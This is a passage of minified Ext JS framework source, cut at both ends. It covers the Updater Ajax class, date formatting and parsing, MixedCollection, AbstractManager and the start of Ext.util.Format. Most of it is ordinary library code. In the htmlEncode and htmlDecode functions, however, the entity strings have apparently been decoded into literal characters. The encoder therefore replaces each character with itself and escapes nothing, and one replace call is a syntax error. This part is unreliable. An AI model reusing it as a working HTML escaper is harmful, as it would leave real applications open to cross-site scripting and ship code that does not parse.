i.transaction = null;
if (h.argument.form && h.argument.reset) {
try {
h.argument.form.reset()
} catch (j) {
}
}
if (i.loadScripts) {
i.renderer.render(i.el, h, i, g.createDelegate(i, [h]))
} else {
i.renderer.render(i.el, h, i);
g.call(i, h)
}
}
function g(h, i, j) {
this.fireEvent(i || d, this.el, h);
if (Ext.isFunction(h.argument.callback)) {
h.argument.callback.call(h.argument.scope, this.el, Ext.isEmpty(j) ? true : false, h, h.argument.options)
}
}
function e(h) {
g.call(this, h, c, !!(this.transaction = null))
}
return{constructor:function (i, h) {
var j = this;
i = Ext.get(i);
if (!h && i.updateManager) {
return i.updateManager
}
j.el = i;
j.defaultUrl = null;
j.addEvents(b, d, c);
Ext.apply(j, Ext.Updater.defaults);
j.transaction = null;
j.refreshDelegate = j.refresh.createDelegate(j);
j.updateDelegate = j.update.createDelegate(j);
j.formUpdateDelegate = (j.formUpdate || function () {
}).createDelegate(j);
j.renderer = j.renderer || j.getDefaultRenderer();
Ext.Updater.superclass.constructor.call(j)
}, setRenderer:function (h) {
this.renderer = h
}, getRenderer:function () {
return this.renderer
}, getDefaultRenderer:function () {
return new Ext.Updater.BasicRenderer()
}, setDefaultUrl:function (h) {
this.defaultUrl = h
}, getEl:function () {
return this.el
}, update:function (i, n, p, l) {
var k = this, h, j;
if (k.fireEvent(b, k.el, i, n) !== false) {
if (Ext.isObject(i)) {
h = i;
i = h.url;
n = n || h.params;
p = p || h.callback;
l = l || h.discardUrl;
j = h.scope;
if (!Ext.isEmpty(h.nocache)) {
k.disableCaching = h.nocache
}
if (!Ext.isEmpty(h.text)) {
k.indicatorText = '<div class="loading-indicator">' + h.text + "</div>"
}
if (!Ext.isEmpty(h.scripts)) {
k.loadScripts = h.scripts
}
if (!Ext.isEmpty(h.timeout)) {
k.timeout = h.timeout
}
}
k.showLoading();
if (!l) {
k.defaultUrl = i
}
if (Ext.isFunction(i)) {
i = i.call(k)
}
var m = Ext.apply({}, {url:i, params:(Ext.isFunction(n) && j) ? n.createDelegate(j) : n, success:a, failure:e, scope:k, callback:undefined, timeout:(k.timeout * 1000), disableCaching:k.disableCaching, argument:{options:h, url:i, form:null, callback:p, scope:j || window, params:n}}, h);
k.transaction = Ext.Ajax.request(m)
}
}, formUpdate:function (k, h, j, l) {
var i = this;
if (i.fireEvent(b, i.el, k, h) !== false) {
if (Ext.isFunction(h)) {
h = h.call(i)
}
k = Ext.getDom(k);
i.transaction = Ext.Ajax.request({form:k, url:h, success:a, failure:e, scope:i, timeout:(i.timeout * 1000), argument:{url:h, form:k, callback:l, reset:j}});
i.showLoading.defer(1, i)
}
}, startAutoRefresh:function (i, j, l, m, h) {
var k = this;
if (h) {
k.update(j || k.defaultUrl, l, m, true)
}
if (k.autoRefreshProcId) {
clearInterval(k.autoRefreshProcId)
}
k.autoRefreshProcId = setInterval(k.update.createDelegate(k, [j || k.defaultUrl, l, m, true]), i * 1000)
}, stopAutoRefresh:function () {
if (this.autoRefreshProcId) {
clearInterval(this.autoRefreshProcId);
delete this.autoRefreshProcId
}
}, isAutoRefreshing:function () {
return !!this.autoRefreshProcId
}, showLoading:function () {
if (this.showLoadIndicator) {
this.el.dom.innerHTML = this.indicatorText
}
}, abort:function () {
if (this.transaction) {
Ext.Ajax.abort(this.transaction)
}
}, isUpdating:function () {
return this.transaction ? Ext.Ajax.isLoading(this.transaction) : false
}, refresh:function (h) {
if (this.defaultUrl) {
this.update(this.defaultUrl, null, h, true)
}
}}
}());
Ext.Updater.defaults = {timeout:30, disableCaching:false, showLoadIndicator:true, indicatorText:'<div class="loading-indicator">Loading...</div>', loadScripts:false, sslBlankUrl:Ext.SSL_SECURE_URL};
Ext.Updater.updateElement = function (d, c, e, b) {
var a = Ext.get(d).getUpdater();
Ext.apply(a, b);
a.update(c, e, b ? b.callback : null)
};
Ext.Updater.BasicRenderer = function () {
};
Ext.Updater.BasicRenderer.prototype = {render:function (c, a, b, d) {
c.update(a.responseText, b.loadScripts, d)
}};
(function () {
Date.useStrict = false;
function b(d) {
var c = Array.prototype.slice.call(arguments, 1);
return d.replace(/\{(\d+)\}/g, function (e, g) {
return c[g]
})
}
Date.formatCodeToRegex = function (d, c) {
var e = Date.parseCodes[d];
if (e) {
e = typeof e == "function" ? e() : e;
Date.parseCodes[d] = e
}
return e ? Ext.applyIf({c:e.c ? b(e.c, c || "{0}") : e.c}, e) : {g:0, c:null, s:Ext.escapeRe(d)}
};
var a = Date.formatCodeToRegex;
Ext.apply(Date, {parseFunctions:{"M$":function (d, c) {
var e = new RegExp("\\/Date\\(([-+])?(\\d+)(?:[+-]\\d{4})?\\)\\/");
var g = (d || "").match(e);
return g ? new Date(((g[1] || "") + g[2]) * 1) : null
}}, parseRegexes:[], formatFunctions:{"M$":function () {
return"\\/Date(" + this.getTime() + ")\\/"
}}, y2kYear:50, MILLI:"ms", SECOND:"s", MINUTE:"mi", HOUR:"h", DAY:"d", MONTH:"mo", YEAR:"y", defaults:{}, dayNames:["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"], monthNames:["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"], monthNumbers:{Jan:0, Feb:1, Mar:2, Apr:3, May:4, Jun:5, Jul:6, Aug:7, Sep:8, Oct:9, Nov:10, Dec:11}, getShortMonthName:function (c) {
return Date.monthNames[c].substring(0, 3)
}, getShortDayName:function (c) {
return Date.dayNames[c].substring(0, 3)
}, getMonthNumber:function (c) {
return Date.monthNumbers[c.substring(0, 1).toUpperCase() + c.substring(1, 3).toLowerCase()]
}, formatContainsHourInfo:(function () {
var d = /(\\.)/g, c = /([gGhHisucUOPZ]|M\$)/;
return function (e) {
return c.test(e.replace(d, ""))
}
})(), formatCodes:{d:"String.leftPad(this.getDate(), 2, '0')", D:"Date.getShortDayName(this.getDay())", j:"this.getDate()", l:"Date.dayNames[this.getDay()]", N:"(this.getDay() ? this.getDay() : 7)", S:"this.getSuffix()", w:"this.getDay()", z:"this.getDayOfYear()", W:"String.leftPad(this.getWeekOfYear(), 2, '0')", F:"Date.monthNames[this.getMonth()]", m:"String.leftPad(this.getMonth() + 1, 2, '0')", M:"Date.getShortMonthName(this.getMonth())", n:"(this.getMonth() + 1)", t:"this.getDaysInMonth()", L:"(this.isLeapYear() ? 1 : 0)", o:"(this.getFullYear() + (this.getWeekOfYear() == 1 && this.getMonth() > 0 ? +1 : (this.getWeekOfYear() >= 52 && this.getMonth() < 11 ? -1 : 0)))", Y:"String.leftPad(this.getFullYear(), 4, '0')", y:"('' + this.getFullYear()).substring(2, 4)", a:"(this.getHours() < 12 ? 'am' : 'pm')", A:"(this.getHours() < 12 ? 'AM' : 'PM')", g:"((this.getHours() % 12) ? this.getHours() % 12 : 12)", G:"this.getHours()", h:"String.leftPad((this.getHours() % 12) ? this.getHours() % 12 : 12, 2, '0')", H:"String.leftPad(this.getHours(), 2, '0')", i:"String.leftPad(this.getMinutes(), 2, '0')", s:"String.leftPad(this.getSeconds(), 2, '0')", u:"String.leftPad(this.getMilliseconds(), 3, '0')", O:"this.getGMTOffset()", P:"this.getGMTOffset(true)", T:"this.getTimezone()", Z:"(this.getTimezoneOffset() * -60)", c:function () {
for (var k = "Y-m-dTH:i:sP", h = [], g = 0, d = k.length; g < d; ++g) {
var j = k.charAt(g);
h.push(j == "T" ? "'T'" : Date.getFormatCode(j))
}
return h.join(" + ")
}, U:"Math.round(this.getTime() / 1000)"}, isValid:function (o, c, n, k, g, j, e) {
k = k || 0;
g = g || 0;
j = j || 0;
e = e || 0;
var l = new Date(o < 100 ? 100 : o, c - 1, n, k, g, j, e).add(Date.YEAR, o < 100 ? o - 100 : 0);
return o == l.getFullYear() && c == l.getMonth() + 1 && n == l.getDate() && k == l.getHours() && g == l.getMinutes() && j == l.getSeconds() && e == l.getMilliseconds()
}, parseDate:function (d, g, c) {
var e = Date.parseFunctions;
if (e[g] == null) {
Date.createParser(g)
}
return e[g](d, Ext.isDefined(c) ? c : Date.useStrict)
}, getFormatCode:function (d) {
var c = Date.formatCodes[d];
if (c) {
c = typeof c == "function" ? c() : c;
Date.formatCodes[d] = c
}
return c || ("'" + String.escape(d) + "'")
}, createFormat:function (h) {
var g = [], c = false, e = "";
for (var d = 0; d < h.length; ++d) {
e = h.charAt(d);
if (!c && e == "\\") {
c = true
} else {
if (c) {
c = false;
g.push("'" + String.escape(e) + "'")
} else {
g.push(Date.getFormatCode(e))
}
}
}
Date.formatFunctions[h] = new Function("return " + g.join("+"))
}, createParser:function () {
var c = ["var dt, y, m, d, h, i, s, ms, o, z, zz, u, v,", "def = Date.defaults,", "results = String(input).match(Date.parseRegexes[{0}]);", "if(results){", "{1}", "if(u != null){", "v = new Date(u * 1000);", "}else{", "dt = (new Date()).clearTime();", "y = Ext.num(y, Ext.num(def.y, dt.getFullYear()));", "m = Ext.num(m, Ext.num(def.m - 1, dt.getMonth()));", "d = Ext.num(d, Ext.num(def.d, dt.getDate()));", "h = Ext.num(h, Ext.num(def.h, dt.getHours()));", "i = Ext.num(i, Ext.num(def.i, dt.getMinutes()));", "s = Ext.num(s, Ext.num(def.s, dt.getSeconds()));", "ms = Ext.num(ms, Ext.num(def.ms, dt.getMilliseconds()));", "if(z >= 0 && y >= 0){", "v = new Date(y < 100 ? 100 : y, 0, 1, h, i, s, ms).add(Date.YEAR, y < 100 ? y - 100 : 0);", "v = !strict? v : (strict === true && (z <= 364 || (v.isLeapYear() && z <= 365))? v.add(Date.DAY, z) : null);", "}else if(strict === true && !Date.isValid(y, m + 1, d, h, i, s, ms)){", "v = null;", "}else{", "v = new Date(y < 100 ? 100 : y, m, d, h, i, s, ms).add(Date.YEAR, y < 100 ? y - 100 : 0);", "}", "}", "}", "if(v){", "if(zz != null){", "v = v.add(Date.SECOND, -v.getTimezoneOffset() * 60 - zz);", "}else if(o){", "v = v.add(Date.MINUTE, -v.getTimezoneOffset() + (sn == '+'? -1 : 1) * (hr * 60 + mn));", "}", "}", "return v;"].join("\n");
return function (m) {
var e = Date.parseRegexes.length, o = 1, g = [], l = [], k = false, d = "", j = 0, h, n;
for (; j < m.length; ++j) {
d = m.charAt(j);
if (!k && d == "\\") {
k = true
} else {
if (k) {
k = false;
l.push(String.escape(d))
} else {
h = a(d, o);
o += h.g;
l.push(h.s);
if (h.g && h.c) {
if (h.calcLast) {
n = h.c
} else {
g.push(h.c)
}
}
}
}
}
if (n) {
g.push(n)
}
Date.parseRegexes[e] = new RegExp("^" + l.join("") + "$", "i");
Date.parseFunctions[m] = new Function("input", "strict", b(c, e, g.join("")))
}
}(), parseCodes:{d:{g:1, c:"d = parseInt(results[{0}], 10);\n", s:"(\\d{2})"}, j:{g:1, c:"d = parseInt(results[{0}], 10);\n", s:"(\\d{1,2})"}, D:function () {
for (var c = [], d = 0; d < 7; c.push(Date.getShortDayName(d)), ++d) {
}
return{g:0, c:null, s:"(?:" + c.join("|") + ")"}
}, l:function () {
return{g:0, c:null, s:"(?:" + Date.dayNames.join("|") + ")"}
}, N:{g:0, c:null, s:"[1-7]"}, S:{g:0, c:null, s:"(?:st|nd|rd|th)"}, w:{g:0, c:null, s:"[0-6]"}, z:{g:1, c:"z = parseInt(results[{0}], 10);\n", s:"(\\d{1,3})"}, W:{g:0, c:null, s:"(?:\\d{2})"}, F:function () {
return{g:1, c:"m = parseInt(Date.getMonthNumber(results[{0}]), 10);\n", s:"(" + Date.monthNames.join("|") + ")"}
}, M:function () {
for (var c = [], d = 0; d < 12; c.push(Date.getShortMonthName(d)), ++d) {
}
return Ext.applyIf({s:"(" + c.join("|") + ")"}, a("F"))
}, m:{g:1, c:"m = parseInt(results[{0}], 10) - 1;\n", s:"(\\d{2})"}, n:{g:1, c:"m = parseInt(results[{0}], 10) - 1;\n", s:"(\\d{1,2})"}, t:{g:0, c:null, s:"(?:\\d{2})"}, L:{g:0, c:null, s:"(?:1|0)"}, o:function () {
return a("Y")
}, Y:{g:1, c:"y = parseInt(results[{0}], 10);\n", s:"(\\d{4})"}, y:{g:1, c:"var ty = parseInt(results[{0}], 10);\ny = ty > Date.y2kYear ? 1900 + ty : 2000 + ty;\n", s:"(\\d{1,2})"}, a:function () {
return a("A")
}, A:{calcLast:true, g:1, c:"if (/(am)/i.test(results[{0}])) {\nif (!h || h == 12) { h = 0; }\n} else { if (!h || h < 12) { h = (h || 0) + 12; }}", s:"(AM|PM|am|pm)"}, g:function () {
return a("G")
}, G:{g:1, c:"h = parseInt(results[{0}], 10);\n", s:"(\\d{1,2})"}, h:function () {
return a("H")
}, H:{g:1, c:"h = parseInt(results[{0}], 10);\n", s:"(\\d{2})"}, i:{g:1, c:"i = parseInt(results[{0}], 10);\n", s:"(\\d{2})"}, s:{g:1, c:"s = parseInt(results[{0}], 10);\n", s:"(\\d{2})"}, u:{g:1, c:"ms = results[{0}]; ms = parseInt(ms, 10)/Math.pow(10, ms.length - 3);\n", s:"(\\d+)"}, O:{g:1, c:["o = results[{0}];", "var sn = o.substring(0,1),", "hr = o.substring(1,3)*1 + Math.floor(o.substring(3,5) / 60),", "mn = o.substring(3,5) % 60;", "o = ((-12 <= (hr*60 + mn)/60) && ((hr*60 + mn)/60 <= 14))? (sn + String.leftPad(hr, 2, '0') + String.leftPad(mn, 2, '0')) : null;\n"].join("\n"), s:"([+-]\\d{4})"}, P:{g:1, c:["o = results[{0}];", "var sn = o.substring(0,1),", "hr = o.substring(1,3)*1 + Math.floor(o.substring(4,6) / 60),", "mn = o.substring(4,6) % 60;", "o = ((-12 <= (hr*60 + mn)/60) && ((hr*60 + mn)/60 <= 14))? (sn + String.leftPad(hr, 2, '0') + String.leftPad(mn, 2, '0')) : null;\n"].join("\n"), s:"([+-]\\d{2}:\\d{2})"}, T:{g:0, c:null, s:"[A-Z]{1,4}"}, Z:{g:1, c:"zz = results[{0}] * 1;\nzz = (-43200 <= zz && zz <= 50400)? zz : null;\n", s:"([+-]?\\d{1,5})"}, c:function () {
var e = [], c = [a("Y", 1), a("m", 2), a("d", 3), a("h", 4), a("i", 5), a("s", 6), {c:"ms = results[7] || '0'; ms = parseInt(ms, 10)/Math.pow(10, ms.length - 3);\n"}, {c:["if(results[8]) {", "if(results[8] == 'Z'){", "zz = 0;", "}else if (results[8].indexOf(':') > -1){", a("P", 8).c, "}else{", a("O", 8).c, "}", "}"].join("\n")}];
for (var g = 0, d = c.length; g < d; ++g) {
e.push(c[g].c)
}
return{g:1, c:e.join(""), s:[c[0].s, "(?:", "-", c[1].s, "(?:", "-", c[2].s, "(?:", "(?:T| )?", c[3].s, ":", c[4].s, "(?::", c[5].s, ")?", "(?:(?:\\.|,)(\\d+))?", "(Z|(?:[-+]\\d{2}(?::)?\\d{2}))?", ")?", ")?", ")?"].join("")}
}, U:{g:1, c:"u = parseInt(results[{0}], 10);\n", s:"(-?\\d+)"}}})
}());
Ext.apply(Date.prototype, {dateFormat:function (a) {
if (Date.formatFunctions[a] == null) {
Date.createFormat(a)
}
return Date.formatFunctions[a].call(this)
}, getTimezone:function () {
return this.toString().replace(/^.* (?:\((.*)\)|([A-Z]{1,4})(?:[\-+][0-9]{4})?(?: -?\d+)?)$/, "$1$2").replace(/[^A-Z]/g, "")
}, getGMTOffset:function (a) {
return(this.getTimezoneOffset() > 0 ? "-" : "+") + String.leftPad(Math.floor(Math.abs(this.getTimezoneOffset()) / 60), 2, "0") + (a ? ":" : "") + String.leftPad(Math.abs(this.getTimezoneOffset() % 60), 2, "0")
}, getDayOfYear:function () {
var b = 0, e = this.clone(), a = this.getMonth(), c;
for (c = 0, e.setDate(1), e.setMonth(0); c < a; e.setMonth(++c)) {
b += e.getDaysInMonth()
}
return b + this.getDate() - 1
}, getWeekOfYear:function () {
var a = 86400000, b = 7 * a;
return function () {
var d = Date.UTC(this.getFullYear(), this.getMonth(), this.getDate() + 3) / a, c = Math.floor(d / 7), e = new Date(c * b).getUTCFullYear();
return c - Math.floor(Date.UTC(e, 0, 7) / b) + 1
}
}(), isLeapYear:function () {
var a = this.getFullYear();
return !!((a & 3) == 0 && (a % 100 || (a % 400 == 0 && a)))
}, getFirstDayOfMonth:function () {
var a = (this.getDay() - (this.getDate() - 1)) % 7;
return(a < 0) ? (a + 7) : a
}, getLastDayOfMonth:function () {
return this.getLastDateOfMonth().getDay()
}, getFirstDateOfMonth:function () {
return new Date(this.getFullYear(), this.getMonth(), 1)
}, getLastDateOfMonth:function () {
return new Date(this.getFullYear(), this.getMonth(), this.getDaysInMonth())
}, getDaysInMonth:function () {
var a = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31];
return function () {
var b = this.getMonth();
return b == 1 && this.isLeapYear() ? 29 : a[b]
}
}(), getSuffix:function () {
switch (this.getDate()) {
case 1:
case 21:
case 31:
return"st";
case 2:
case 22:
return"nd";
case 3:
case 23:
return"rd";
default:
return"th"
}
}, clone:function () {
return new Date(this.getTime())
}, isDST:function () {
return new Date(this.getFullYear(), 0, 1).getTimezoneOffset() != this.getTimezoneOffset()
}, clearTime:function (g) {
if (g) {
return this.clone().clearTime()
}
var b = this.getDate();
this.setHours(0);
this.setMinutes(0);
this.setSeconds(0);
this.setMilliseconds(0);
if (this.getDate() != b) {
for (var a = 1, e = this.add(Date.HOUR, a); e.getDate() != b; a++, e = this.add(Date.HOUR, a)) {
}
this.setDate(b);
this.setHours(e.getHours())
}
return this
}, add:function (b, c) {
var e = this.clone();
if (!b || c === 0) {
return e
}
switch (b.toLowerCase()) {
case Date.MILLI:
e.setMilliseconds(this.getMilliseconds() + c);
break;
case Date.SECOND:
e.setSeconds(this.getSeconds() + c);
break;
case Date.MINUTE:
e.setMinutes(this.getMinutes() + c);
break;
case Date.HOUR:
e.setHours(this.getHours() + c);
break;
case Date.DAY:
e.setDate(this.getDate() + c);
break;
case Date.MONTH:
var a = this.getDate();
if (a > 28) {
a = Math.min(a, this.getFirstDateOfMonth().add("mo", c).getLastDateOfMonth().getDate())
}
e.setDate(a);
e.setMonth(this.getMonth() + c);
break;
case Date.YEAR:
e.setFullYear(this.getFullYear() + c);
break
}
return e
}, between:function (c, a) {
var b = this.getTime();
return c.getTime() <= b && b <= a.getTime()
}});
Date.prototype.format = Date.prototype.dateFormat;
if (Ext.isSafari && (navigator.userAgent.match(/WebKit\/(\d+)/)[1] || NaN) < 420) {
Ext.apply(Date.prototype, {_xMonth:Date.prototype.setMonth, _xDate:Date.prototype.setDate, setMonth:function (a) {
if (a <= -1) {
var d = Math.ceil(-a), c = Math.ceil(d / 12), b = (d % 12) ? 12 - d % 12 : 0;
this.setFullYear(this.getFullYear() - c);
return this._xMonth(b)
} else {
return this._xMonth(a)
}
}, setDate:function (a) {
return this.setTime(this.getTime() - (this.getDate() - a) * 86400000)
}})
}
Ext.util.MixedCollection = function (b, a) {
this.items = [];
this.map = {};
this.keys = [];
this.length = 0;
this.addEvents("clear", "add", "replace", "remove", "sort");
this.allowFunctions = b === true;
if (a) {
this.getKey = a
}
Ext.util.MixedCollection.superclass.constructor.call(this)
};
Ext.extend(Ext.util.MixedCollection, Ext.util.Observable, {allowFunctions:false, add:function (b, c) {
if (arguments.length == 1) {
c = arguments[0];
b = this.getKey(c)
}
if (typeof b != "undefined" && b !== null) {
var a = this.map[b];
if (typeof a != "undefined") {
return this.replace(b, c)
}
this.map[b] = c
}
this.length++;
this.items.push(c);
this.keys.push(b);
this.fireEvent("add", this.length - 1, c, b);
return c
}, getKey:function (a) {
return a.id
}, replace:function (c, d) {
if (arguments.length == 1) {
d = arguments[0];
c = this.getKey(d)
}
var a = this.map[c];
if (typeof c == "undefined" || c === null || typeof a == "undefined") {
return this.add(c, d)
}
var b = this.indexOfKey(c);
this.items[b] = d;
this.map[c] = d;
this.fireEvent("replace", c, a, d);
return d
}, addAll:function (e) {
if (arguments.length > 1 || Ext.isArray(e)) {
var b = arguments.length > 1 ? arguments : e;
for (var d = 0, a = b.length; d < a; d++) {
this.add(b[d])
}
} else {
for (var c in e) {
if (this.allowFunctions || typeof e[c] != "function") {
this.add(c, e[c])
}
}
}
}, each:function (e, d) {
var b = [].concat(this.items);
for (var c = 0, a = b.length; c < a; c++) {
if (e.call(d || b[c], b[c], c, a) === false) {
break
}
}
}, eachKey:function (d, c) {
for (var b = 0, a = this.keys.length; b < a; b++) {
d.call(c || window, this.keys[b], this.items[b], b, a)
}
}, find:function (d, c) {
for (var b = 0, a = this.items.length; b < a; b++) {
if (d.call(c || window, this.items[b], this.keys[b])) {
return this.items[b]
}
}
return null
}, insert:function (a, b, c) {
if (arguments.length == 2) {
c = arguments[1];
b = this.getKey(c)
}
if (this.containsKey(b)) {
this.suspendEvents();
this.removeKey(b);
this.resumeEvents()
}
if (a >= this.length) {
return this.add(b, c)
}
this.length++;
this.items.splice(a, 0, c);
if (typeof b != "undefined" && b !== null) {
this.map[b] = c
}
this.keys.splice(a, 0, b);
this.fireEvent("add", a, c, b);
return c
}, remove:function (a) {
return this.removeAt(this.indexOf(a))
}, removeAt:function (a) {
if (a < this.length && a >= 0) {
this.length--;
var c = this.items[a];
this.items.splice(a, 1);
var b = this.keys[a];
if (typeof b != "undefined") {
delete this.map[b]
}
this.keys.splice(a, 1);
this.fireEvent("remove", c, b);
return c
}
return false
}, removeKey:function (a) {
return this.removeAt(this.indexOfKey(a))
}, getCount:function () {
return this.length
}, indexOf:function (a) {
return this.items.indexOf(a)
}, indexOfKey:function (a) {
return this.keys.indexOf(a)
}, item:function (b) {
var a = this.map[b], c = a !== undefined ? a : (typeof b == "number") ? this.items[b] : undefined;
return typeof c != "function" || this.allowFunctions ? c : null
}, itemAt:function (a) {
return this.items[a]
}, key:function (a) {
return this.map[a]
}, contains:function (a) {
return this.indexOf(a) != -1
}, containsKey:function (a) {
return typeof this.map[a] != "undefined"
}, clear:function () {
this.length = 0;
this.items = [];
this.keys = [];
this.map = {};
this.fireEvent("clear")
}, first:function () {
return this.items[0]
}, last:function () {
return this.items[this.length - 1]
}, _sort:function (k, a, j) {
var d, e, b = String(a).toUpperCase() == "DESC" ? -1 : 1, h = [], l = this.keys, g = this.items;
j = j || function (i, c) {
return i - c
};
for (d = 0, e = g.length; d < e; d++) {
h[h.length] = {key:l[d], value:g[d], index:d}
}
h.sort(function (i, c) {
var m = j(i[k], c[k]) * b;
if (m === 0) {
m = (i.index < c.index ? -1 : 1)
}
return m
});
for (d = 0, e = h.length; d < e; d++) {
g[d] = h[d].value;
l[d] = h[d].key
}
this.fireEvent("sort", this)
}, sort:function (a, b) {
this._sort("value", a, b)
}, reorder:function (d) {
this.suspendEvents();
var b = this.items, c = 0, g = b.length, a = [], e = [], h;
for (h in d) {
a[d[h]] = b[h]
}
for (c = 0; c < g; c++) {
if (d[c] == undefined) {
e.push(b[c])
}
}
for (c = 0; c < g; c++) {
if (a[c] == undefined) {
a[c] = e.shift()
}
}
this.clear();
this.addAll(a);
this.resumeEvents();
this.fireEvent("sort", this)
}, keySort:function (a, b) {
this._sort("key", a, b || function (d, c) {
var g = String(d).toUpperCase(), e = String(c).toUpperCase();
return g > e ? 1 : (g < e ? -1 : 0)
})
}, getRange:function (e, a) {
var b = this.items;
if (b.length < 1) {
return[]
}
e = e || 0;
a = Math.min(typeof a == "undefined" ? this.length - 1 : a, this.length - 1);
var c, d = [];
if (e <= a) {
for (c = e; c <= a; c++) {
d[d.length] = b[c]
}
} else {
for (c = e; c >= a; c--) {
d[d.length] = b[c]
}
}
return d
}, filter:function (c, b, d, a) {
if (Ext.isEmpty(b, false)) {
return this.clone()
}
b = this.createValueMatcher(b, d, a);
return this.filterBy(function (e) {
return e && b.test(e[c])
})
}, filterBy:function (g, e) {
var h = new Ext.util.MixedCollection();
h.getKey = this.getKey;
var b = this.keys, d = this.items;
for (var c = 0, a = d.length; c < a; c++) {
if (g.call(e || this, d[c], b[c])) {
h.add(b[c], d[c])
}
}
return h
}, findIndex:function (c, b, e, d, a) {
if (Ext.isEmpty(b, false)) {
return -1
}
b = this.createValueMatcher(b, d, a);
return this.findIndexBy(function (g) {
return g && b.test(g[c])
}, null, e)
}, findIndexBy:function (g, e, h) {
var b = this.keys, d = this.items;
for (var c = (h || 0), a = d.length; c < a; c++) {
if (g.call(e || this, d[c], b[c])) {
return c
}
}
return -1
}, createValueMatcher:function (c, e, a, b) {
if (!c.exec) {
var d = Ext.escapeRe;
c = String(c);
if (e === true) {
c = d(c)
} else {
c = "^" + d(c);
if (b === true) {
c += "$"
}
}
c = new RegExp(c, a ? "" : "i")
}
return c
}, clone:function () {
var e = new Ext.util.MixedCollection();
var b = this.keys, d = this.items;
for (var c = 0, a = d.length; c < a; c++) {
e.add(b[c], d[c])
}
e.getKey = this.getKey;
return e
}});
Ext.util.MixedCollection.prototype.get = Ext.util.MixedCollection.prototype.item;
Ext.AbstractManager = Ext.extend(Object, {typeName:"type", constructor:function (a) {
Ext.apply(this, a || {});
this.all = new Ext.util.MixedCollection();
this.types = {}
}, get:function (a) {
return this.all.get(a)
}, register:function (a) {
this.all.add(a)
}, unregister:function (a) {
this.all.remove(a)
}, registerType:function (b, a) {
this.types[b] = a;
a[this.typeName] = b
}, isRegistered:function (a) {
return this.types[a] !== undefined
}, create:function (a, d) {
var b = a[this.typeName] || a.type || d, c = this.types[b];
if (c == undefined) {
throw new Error(String.format("The '{0}' type has not been registered with this manager", b))
}
return new c(a)
}, onAvailable:function (d, c, b) {
var a = this.all;
a.on("add", function (e, g) {
if (g.id == d) {
c.call(b || g, g);
a.un("add", c, b)
}
})
}});
Ext.util.Format = function () {
var trimRe = /^\s+|\s+$/g, stripTagsRE = /<\/?[^>]+>/gi, stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig, nl2brRe = /\r?\n/g;
return{ellipsis:function (value, len, word) {
if (value && value.length > len) {
if (word) {
var vs = value.substr(0, len - 2), index = Math.max(vs.lastIndexOf(" "), vs.lastIndexOf("."), vs.lastIndexOf("!"), vs.lastIndexOf("?"));
if (index == -1 || index < (len - 15)) {
return value.substr(0, len - 3) + "..."
} else {
return vs.substr(0, index) + "..."
}
} else {
return value.substr(0, len - 3) + "..."
}
}
return value
}, undef:function (value) {
return value !== undefined ? value : ""
}, defaultValue:function (value, defaultValue) {
return value !== undefined && value !== "" ? value : defaultValue
}, htmlEncode:function (value) {
return !value ? value : String(value).replace(/&/g, "&").replace(/>/g, ">").replace(/</g, "<").replace(/"/g, """)
}, htmlDecode:function (value) {
return !value ? value : String(value).replace(/>/g, ">").replace(/</g, "<").replace(/"/g, '"').replace(/&/g, "&")
}, trim:function (value) {
return String(value).replace(trimRe, "")
}, substr:function (value, start, length) {
return String(value).substr(start, length)
}, lowercase:function (value) {
return String(value).toLowerCase()
}, uppercase:function (value) {
return String(value).toUpperCase()
}, capitalize:function (value) {
return !value ? value : value.charAt(0).toUpperCase() + value.substr(1).toLowerCase()
}, call:function (value, fn) {
if (arguments.length > 2) {
var args = Array.prototype.slice.call(arguments, 2);
args.unshift(value);
return eval(fn).apply(window, args)
} else {
return eval(fn).call(window, value)
}
}, usMoney:function (v) {
v = (Math.round((v - 0) * 100)) / 100;
v = (v == Math.floor(v)) ? v + ".00" : ((v * 10 == Math.floor(v * 10)) ? v + "0" : v);
v = String(v);
var ps = v.split("."), whole = ps[0], sub = ps[1] ? "." + ps[1] : ".00", r = /(\d+)(\d{3})/;
while (r.test(whole)) {
whole = whole.replace(r, "$1,$2")
}
v = whole + sub;
if (v.charAt(0) == "-") {
return"-$" + v.substr(1)
}
return"$" + v
}, date:function (v, format) {
if (!v) {
return""
}
if (!Ext.isDate(v)) {
v = new Date(Date.parse(v))
}
return v.dateFormat(format || "m/d/Y")
}, dateRenderer:function (format) {
return function (v) {
return Ext.util.Format.date(v, format)
}
}, stripTags:function (v) {
return !v ? v : String(v).replace(stripTagsRE, "")
}, stripScripts:function (v) {
return !v ? v : String(v).replace(stripScriptsRe, "")
}, fileSize:function (size) {
if (size < 1024) {
return size + " bytes"
} else {
if (size < 1048576) {
return(Math.round(((size * 10) / 1024)) / 10) + " KB"
} else {
return(Math.round(((size * 10) / 1048576)) / 10) + " MB"
}
}
}, math:function () {
var fns = {};
return function (v, a) {
if (!fns[a]) {
fns[a] = new Function("v", "return v " + a + ";")
}
return fns[a](v)
}
}(), round:function (value, precision) {
var result = Number(value);
if (typeof precision == "number") {
precision = Math.pow(10, precision);
result = Math.round(value * precision) / precision
}
return result
}, number:function (v, format) {
if (!format) {
return v
}
v = Ext.num(v, NaN);
if (isNaN(v)) {
return""
}
var comma = ",", dec = ".", i18n = false, neg = v < 0;
v = Math.abs(v);
if (format.substr(format.length - 2) == "/i") {
format = format.substr(0, format.length - 2);
i18n = true;
comma = ".";
dec = ","
}
var hasComma = format.indexOf(comma) != -1, psplit = (i18n ? format.replace(/[^\d\,]/g, "") : format.replace(/[^\d\.]/g, "")).split(dec);
if (1 < psplit.length) {
v = v.toFixed(psplit[1].length)
} else {
if (2 < psplit.length) {
throw ("NumberFormatException: invalid format, formats should have no more than 1 period: " + format)
} else {
v = v.toFixed(0)
}
}
var fnum = v.toString();
psplit = fnum.split(".");
if (hasComma) {
var cnum = psplit[0], parr = [], j = cnum.length, m = Math.floor(j / 3), n = cnum.length % 3 || 3, i;
for (i = 0; i < j; i += n) {
if (i != 0) {
n = 3
}
parr[parr.length] = cnum.substr(i, n);
m -= 1
}
fnum = parr.join(comma);
if (psplit[1]) {
fnum += dec + psplit[1]
}
} else {
if (psplit[1]) {
fnum = psplit[0] + dec + psplit[1]
}
}
return(neg ? "-" : "") + format.replace(/[\d,?\.?]+/, fnum)
}, numberRenderer:function (format) {
return function (v) {
return Ext.util.Format.number(v, format)
}
}, plural:function (v, s, p) {
